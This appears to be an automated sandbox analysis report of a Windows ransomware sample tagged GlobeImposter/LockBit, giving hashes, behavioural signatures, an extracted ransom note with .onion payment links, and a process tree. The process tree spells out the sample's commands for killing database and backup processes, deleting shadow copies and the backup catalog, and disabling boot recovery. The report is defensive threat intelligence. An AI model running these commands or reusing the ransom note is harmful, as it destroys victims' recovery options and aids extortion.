Overview

overview

10

Static

static

2aee7ed6cc...88.exe

windows7_x64

10

2aee7ed6cc...88.exe

windows10-2004_x64

10

Analysis

  • max time kernel
    122s
  • max time network
    49s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    15-06-2022 03:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe

  • Size

    261KB

  • MD5

    860b89a4138f744adbe41cee1de0848f

  • SHA1

    6367510a18f07252168ebdd7029f0e6cde919b8c

  • SHA256

    2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88

  • SHA512

    ed651840d87f8f5a79e2c9b57ae20f8d9e76dc14479cbbebd6f51b3f1ee95ecce70f791172f89c1d606a483c1f26bb247ade535d33e92211094931c80292ee2d

Score
10/10
globeimposterlockbitevasionpersistenceransomwarespywarestealer

Malware Config

Extracted

Path

C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Restore-My-Files.txt

Family

globeimposter

Ransom Note
All your files are Encrypted! For data recovery needs decryptor. How to buy decryptor: ---------------------------------------------------------------------------------------- | 1. Download Tor browser - https://www.torproject.org/ and install it. | 2. Open link in TOR browser - http://alcx6zctcmhmn3kx.onion/ | 3. Follow the instructions on this page ---------------------------------------------------------------------------------------- Note! This link is available via "Tor Browser" only. ------------------------------------------------------------ Free decryption as guarantee. Before paying you can send us 1 file for free decryption. ------------------------------------------------------------ alternate address - http://helpinfh6vj47ift.onion/ DO NOT CHANGE DATA BELO ###s6dlsnhtjwbhr###ED56F6A208E3EB2###
URLs

http://alcx6zctcmhmn3kx.onion/

http://helpinfh6vj47ift.onion/

Signatures

  • GlobeImposter

    GlobeImposter is a ransomware first seen in 2017.

    ransomwareglobeimposter
  • Lockbit

    Ransomware family with multiple variants released since late 2019.

    ransomwarelockbit
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

    ransomware
  • Executes dropped EXE 1 IoCs
  • Modifies extensions of user files 7 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Deletes itself 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Kills process with taskkill 5 IoCs
    evasion
  • NTFS ADS 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 52 IoCs
  • Suspicious use of WriteProcessMemory 59 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe
    "C:\Users\Admin\AppData\Local\Temp\2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1464
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C type nul > "C:\Users\Admin\AppData\Local\Temp\2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe:Zone.Identifier"
      2⤵
      • NTFS ADS
      PID:988
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C type nul > "C:\Users\Admin\AppData\Local\Temp\2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe:Zone.Identifier"
      2⤵
      • NTFS ADS
      PID:2028
    • C:\Users\Admin\AppData\Local\Temp\2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe
      "C:\Users\Admin\AppData\Local\Temp\2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe"
      2⤵
      • Executes dropped EXE
      • Modifies extensions of user files
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:608
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c taskkill /f /im sql* & taskkill /f /im backup* & taskkill /f /im MSExchange* & taskkill /f /im Microsoft.Exchange.* & taskkill /f /im mysql* & vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:616
        • C:\Windows\system32\taskkill.exe
          taskkill /f /im sql*
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1124
        • C:\Windows\system32\taskkill.exe
          taskkill /f /im backup*
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1920
        • C:\Windows\system32\taskkill.exe
          taskkill /f /im MSExchange*
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:652
        • C:\Windows\system32\taskkill.exe
          taskkill /f /im Microsoft.Exchange.*
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1452
        • C:\Windows\system32\taskkill.exe
          taskkill /f /im mysql*
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1656
        • C:\Windows\system32\vssadmin.exe
          vssadmin delete shadows /all /quiet
          4⤵
          • Interacts with shadow copies
          PID:752
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic shadowcopy delete
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1308
        • C:\Windows\system32\bcdedit.exe
          bcdedit /set {default} bootstatuspolicy ignoreallfailures
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:1184
        • C:\Windows\system32\bcdedit.exe
          bcdedit /set {default} recoveryenabled no
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:364
        • C:\Windows\system32\wbadmin.exe
          wbadmin delete catalog -quiet
          4⤵
          • Deletes backup catalog
          PID:1416
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 2 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe"
        3⤵
        • Deletes itself
        • Suspicious use of WriteProcessMemory
        PID:1156
        • C:\Windows\SysWOW64\PING.EXE
          ping 1.1.1.1 -n 2
          4⤵
          • Runs ping.exe
          PID:1836
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:472
  • C:\Windows\system32\wbengine.exe
    "C:\Windows\system32\wbengine.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1988
  • C:\Windows\System32\vdsldr.exe
    C:\Windows\System32\vdsldr.exe -Embedding
    1⤵
      PID:1760
    • C:\Windows\System32\vds.exe
      C:\Windows\System32\vds.exe
      1⤵
        PID:1996

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe
        Filesize

        261KB

        MD5

        860b89a4138f744adbe41cee1de0848f

        SHA1

        6367510a18f07252168ebdd7029f0e6cde919b8c

        SHA256

        2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88

        SHA512

        ed651840d87f8f5a79e2c9b57ae20f8d9e76dc14479cbbebd6f51b3f1ee95ecce70f791172f89c1d606a483c1f26bb247ade535d33e92211094931c80292ee2d

        Download Submit

      • \Users\Admin\AppData\Local\Temp\2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88.exe
        Filesize

        261KB

        MD5

        860b89a4138f744adbe41cee1de0848f

        SHA1

        6367510a18f07252168ebdd7029f0e6cde919b8c

        SHA256

        2aee7ed6cc10cf7e0c86c166586c400c8dab691924d3ef69b1c612ef570bcb88

        SHA512

        ed651840d87f8f5a79e2c9b57ae20f8d9e76dc14479cbbebd6f51b3f1ee95ecce70f791172f89c1d606a483c1f26bb247ade535d33e92211094931c80292ee2d

        Download Submit

      • memory/608-74-0x0000000000400000-0x000000000040E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/608-64-0x0000000000400000-0x000000000040E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/608-79-0x0000000000400000-0x000000000040E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/608-89-0x0000000000400000-0x000000000040E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/608-69-0x0000000000400000-0x000000000040E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/608-63-0x0000000000400000-0x000000000040E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/608-68-0x0000000000400000-0x000000000040E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/608-66-0x0000000000400000-0x000000000040E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/1416-87-0x000007FEFB5D1000-0x000007FEFB5D3000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1464-54-0x0000000000B10000-0x0000000000B54000-memory.dmp

        Filesize

        272KB

        Download

      • memory/1464-58-0x00000000006D0000-0x00000000006DA000-memory.dmp

        Filesize

        40KB

        Download

      • memory/1464-55-0x00000000002F0000-0x000000000031A000-memory.dmp

        Filesize

        168KB

        Download

      • memory/1464-56-0x0000000074B51000-0x0000000074B53000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1464-61-0x0000000000970000-0x000000000097C000-memory.dmp

        Filesize

        48KB

        Download

      • memory/1464-60-0x00000000006E0000-0x00000000006EC000-memory.dmp

        Filesize

        48KB

        Download